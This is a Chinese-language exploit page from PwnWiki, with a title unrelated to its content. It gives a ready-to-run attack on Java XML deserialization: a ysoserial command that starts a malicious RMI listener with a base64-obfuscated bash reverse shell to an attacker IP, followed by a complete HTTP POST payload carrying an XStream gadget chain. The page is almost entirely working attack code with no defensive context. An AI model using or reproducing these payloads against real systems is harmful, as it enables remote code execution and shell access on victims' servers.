Talk:Mw-mainpage-url

From PwnWiki

攻击机启动启动一个恶意的RMI Registry: java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}" 工具下载链接(https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)

然后对目标机器发送poc: POST / HTTP/1.1 Host: 192.168.20.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/xml Content-Length: 3117 <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> 

   <java.util.PriorityQueue>
       <default>
           <size>2</size>
       </default>
       <int>3</int>
       <javax.naming.ldap.Rdn_-RdnEntry>
           <type>12345</type>
           <value class='com.sun.org.apache.xpath.internal.objects.XString'>
               <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
           </value>
       </javax.naming.ldap.Rdn_-RdnEntry>
       <javax.naming.ldap.Rdn_-RdnEntry>
           <type>12345</type>
           <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
               <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                   <parsedMessage>true</parsedMessage>
                   <soapVersion>SOAP_11</soapVersion>
                   <bodyParts/>
                   <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                       <attachmentsInitialized>false</attachmentsInitialized>
                       <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                           <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                               <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                   <names>
                                       <string>aa</string>
                                       <string>aa</string>
                                   </names>
                                   <ctx>
                                       <environment/>
                                       <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                           <java.rmi.server.RemoteObject>
                                               <string>UnicastRef</string>
                                               <string>192.168.20.128</string>
                                               <int>1099</int>
                                               <long>0</long>
                                               <int>0</int>
                                               <long>0</long>
                                               <short>0</short>
                                               <boolean>false</boolean>
                                           </java.rmi.server.RemoteObject>
                                       </registry>
                                       <host>192.168.20.128</host>
                                       <port>1099</port>
                                   </ctx>
                               </candidates>
                           </aliases>
                       </nullIter>
                   </sm>
               </message>
           </value>
       </javax.naming.ldap.Rdn_-RdnEntry>
   </java.util.PriorityQueue>

</java.util.PriorityQueue>

Retrieved from "https://pwnwiki.com/index.php?title=Talk:Mw-mainpage-url&oldid=3736"